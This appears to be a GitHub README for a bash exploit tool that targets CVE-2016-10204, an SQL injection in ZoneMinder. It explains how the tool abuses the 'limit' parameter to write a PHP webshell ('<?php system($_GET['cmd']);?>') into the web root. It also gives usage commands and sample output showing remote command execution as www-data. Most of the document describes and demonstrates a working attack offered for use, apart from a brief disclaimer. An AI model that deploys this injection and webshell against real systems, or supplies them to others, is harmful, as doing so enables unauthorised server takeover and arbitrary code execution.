# CVE-2016-10204_Webshell
A bash script demonstrating the manual exploitation of CVE-2016-10204 against a target endpoint, leading to upload of a php webshell.

Currently, the webshell variable is set for a MySQL payload. This can be replaced with whatever backend you need to target.


More information on this CVE can be found at these sources:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

This script works in several ways:
- Takes a target url in the regular expression format of ^(http|https)://[^/]+/zm/index\.php$
  - E.g. http://192.168.10.100/zm/index.php
- Verifies that there is not already a webshell present at the target url and webshell url suffix given
  - If present, does not exploit again.
  - If not present, then continues
- Constructs a malicious POST request to the /zm/index.php?view=request&request=log&task=query&limit=100&minTime=1466674406.084434 endpoint
  - This request contains an injection point at the &limit=100 parameter which we abuse to do the following
  - Create a new webshell file within /var/www/html
  - SELECT the string "<?php system($_GET['cmd']);?>" INTO this file (we stream it into the file as we write the file out)
- Verifies that the webshell uploaded was created and accessible at the constructed url
- Provides proof of this by executing the 'id' command and presenting it's output.


Usage:
```
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php

General Usage:
/bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target_endpoint/zm/index.php>

Help:


```
Example:
```bash

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Attempting webshell deployment. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23

[*]================================[*]
[*]Webshell deployment successful. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


```

Rerunning against an already exploited target:
```bash
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Webshell already deployed.      [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


```

Included help:
```bash
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
A bash script demonstrating the manual exploitation of CVE-2016-10204 against a target endpoint,
leading to upload of a php webshell.

More information:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

Usage:
  /bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>

Example:
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

Notes:
- Verifies if a webshell already exists before attempting exploitation.
- Constructs a malicious SQLi payload to write a PHP webshell into /var/www/html.
- Confirms deployment by executing 'id' via the ?cmd= parameter.
- Please use responsibly only against devices you have permission to do. This is for educational purposes only.

```
